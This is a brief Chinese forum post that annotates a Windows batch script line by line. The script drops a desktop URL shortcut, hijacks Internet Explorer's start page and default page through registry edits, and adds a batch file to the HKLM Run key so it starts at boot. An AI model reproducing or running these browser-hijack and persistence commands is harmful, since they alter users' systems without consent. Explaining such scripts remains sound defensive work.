    
- 帖子
- 3852
- 积分
- 13044
- 威望
- 16780
- 金钱
- 36761
- 在线时间
- 1139 小时
         
|
echo URL=http://www.qulenet.com/ >>"%userprofile%\桌面\趣乐网3ast.com.cn.url"
在你桌面放一个url快捷方式
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d http://www.3ast.com.cn /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d http://www.3ast.com.cn/ /f
修改注册表,增加它站为主页
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Net /t REG_SZ /d %windir%\system32\net.bat /f
修改注册表,设置该bat文件开机启动 |
|